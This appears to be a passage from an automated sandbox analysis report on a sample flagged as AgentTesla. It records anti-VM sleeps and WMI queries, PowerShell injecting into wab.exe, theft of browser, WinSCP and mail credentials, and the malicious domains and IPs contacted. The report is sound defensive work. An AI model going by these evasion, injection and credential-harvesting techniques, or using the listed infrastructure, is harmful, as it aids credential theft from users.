Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -24903104499507879s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -100000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7604 Thread sleep count: 1467 > 30 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -99873s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7604 Thread sleep count: 8360 > 30 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -99765s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -199312s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -99547s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -99437s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -99327s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -99218s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -99109s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -98999s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -98890s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -98781s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -98671s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -98562s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -98453s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -98343s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -98234s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -98124s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -98015s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -97906s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -97796s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -97687s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -97578s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -97468s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -97359s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -97250s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -97140s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -97031s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -96921s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -96812s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -96703s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -96593s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -96484s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -96374s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -96265s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -96156s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -96046s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -95937s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -95828s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -99875s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -99766s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -99438s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -99313s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -99203s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -99094s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -98969s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -98860s >= -30000s Jump to behavior
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\PI.1.exe Code function: 0_2_0040635D FindFirstFileW,FindClose, 0_2_0040635D
Source: C:\Users\user\Desktop\PI.1.exe Code function: 0_2_0040580B GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_0040580B
Source: C:\Users\user\Desktop\PI.1.exe Code function: 0_2_004027FB FindFirstFileW, 0_2_004027FB
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 100000 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 99873 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 99765 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 99656 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 99547 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 99437 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 99327 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 99218 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 99109 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 98999 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 98890 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 98781 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 98671 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 98562 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 98453 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 98343 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 98234 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 98124 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 98015 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 97906 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 97796 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 97687 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 97578 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 97468 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 97359 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 97250 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 97140 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 97031 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 96921 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 96812 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 96703 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 96593 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 96484 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 96374 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 96265 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 96156 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 96046 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 95937 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 95828 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 99875 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 99766 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 99438 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 99313 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 99203 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 99094 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 98969 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 98860 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Roaming\dyrekllers\Sanguine\Solano\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Roaming\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Roaming\dyrekllers\Sanguine\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Roaming\dyrekllers\ Jump to behavior
Source: wab.exe, 0000000D.00000002.2515992871.0000000004B2F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW$:
Source: wab.exe, 0000000D.00000002.2515992871.0000000004B2F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: wab.exe, 0000000D.00000002.2515992871.0000000004AEB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@k
Source: C:\Users\user\Desktop\PI.1.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\PI.1.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process queried: DebugPort Jump to behavior
Enables debug privileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process token adjusted: Debug Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3CE0000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2A7FB04 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe" /c "set /A 1^^0 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\Program Files (x86)\Windows Mail\wab.exe VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI.1.exe Code function: 0_2_0040326A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_0040326A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected AgentTesla
Source: Yara match File source: 0000000D.00000002.2529559166.0000000020711000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2529559166.0000000020737000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2529559166.000000002074C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wab.exe PID: 7712, type: MEMORYSTR
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\cookies.sqlite Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 0000000D.00000002.2529559166.0000000020711000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wab.exe PID: 7712, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected AgentTesla
Source: Yara match File source: 0000000D.00000002.2529559166.0000000020711000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2529559166.0000000020737000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2529559166.000000002074C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wab.exe PID: 7712, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1410985 Sample: PI.1.exe Startdate: 18/03/2024 Architecture: WINDOWS Score: 100 34 scootero.cl 2->34 36 mail.scootero.cl 2->36 38 2 other IPs or domains 2->38 48 Snort IDS alert for network traffic 2->48 50 Found malware configuration 2->50 52 Antivirus detection for URL or domain 2->52 54 5 other signatures 2->54 8 PI.1.exe 1 31 2->8         started        signatures3 process4 file5 24 C:\Users\user\AppData\...\Hovedperson16.Red, ASCII 8->24 dropped 56 Suspicious powershell command line found 8->56 12 powershell.exe 20 8->12         started        signatures6 process7 file8 26 C:\Users\user\AppData\Roaming\...\PI.1.exe, PE32 12->26 dropped 58 Obfuscated command line found 12->58 60 Writes to foreign memory regions 12->60 62 Powershell drops PE file 12->62 16 wab.exe 15 8 12->16         started        20 conhost.exe 12->20         started        22 cmd.exe 1 12->22         started        signatures9 process10 dnsIp11 28 scootero.cl 177.221.140.242, 49717, 49718, 587 GRUPOCGLIMITADACL unknown 16->28 30 apwisulsel.sa.com 104.128.228.214, 443, 49715 HOSTUS-GLOBAL-ASHostUSHK United States 16->30 32 api.ipify.org 104.26.13.205, 443, 49716 CLOUDFLARENETUS United States 16->32 40 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 16->40 42 Tries to steal Mail credentials (via file / registry access) 16->42 44 Tries to harvest and steal browser information (history, passwords, etc) 16->44 46 Installs a global keyboard hook 16->46 signatures12
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
104.128.228.214
 apwisulsel.sa.com United States
7489 HOSTUS-GLOBAL-ASHostUSHK false
177.221.140.242
 scootero.cl unknown
270014 GRUPOCGLIMITADACL true
104.26.13.205
 api.ipify.org United States
13335 CLOUDFLARENETUS false

Contacted Domains

Name IP Active
api.ipify.org 104.26.13.205 true
apwisulsel.sa.com 104.128.228.214 true
scootero.cl 177.221.140.242 true
mail.scootero.cl unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://api.ipify.org/ false
    		high